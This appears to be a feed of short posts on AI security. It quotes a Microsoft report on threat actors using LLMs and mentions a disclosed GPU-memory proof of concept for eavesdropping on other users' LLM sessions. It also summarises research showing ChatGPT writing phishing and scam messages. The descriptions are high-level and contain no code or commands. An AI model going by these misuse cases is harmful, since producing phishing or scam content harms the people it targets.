[2024/02/14]
Staying ahead of threat actors in the age of AI | Microsoft Security Blog
"[...] identified activity associated with known threat actors, including prompt-injections, attempted misuse of large language models (LLM), and fraud. Our analysis of the current use of LLM technology by threat actors revealed behaviors consistent with attackers using AI as another productivity tool on the offensive landscape."
Pretty interesting disclosure. By recovering local memory—an optimized GPU memory region—researchers were able to build a PoC where an attacker can listen into another user’s interactive LLM session (e.g., llama.cpp) across process or container boundaries.
Has anyone in their company implemented a security policy or code of conduct related to LLMs (such as ChatGPT) that they would be willing to share publicly?
Good news: NIST launches generative #AI working group. The public working group will develop guidance around the special risks of AI technologies that generate content. Stay tuned☝️🛡️ #AISecurity
The power, promise, and peril of cybersecurity in AI age. #SecureAI
Hashtags: #chatGPT#AIsecurity#Cyberthreats Summery: The release of OpenAI's ChatGPT language model has raised concerns about its potential misuse in cyberattacks. Researchers have demonstrated how the chatbot can be used to write convincing email messages that encourage recipients to share corporate secrets, create tweets promoting investment scams, and attack individuals through social media.…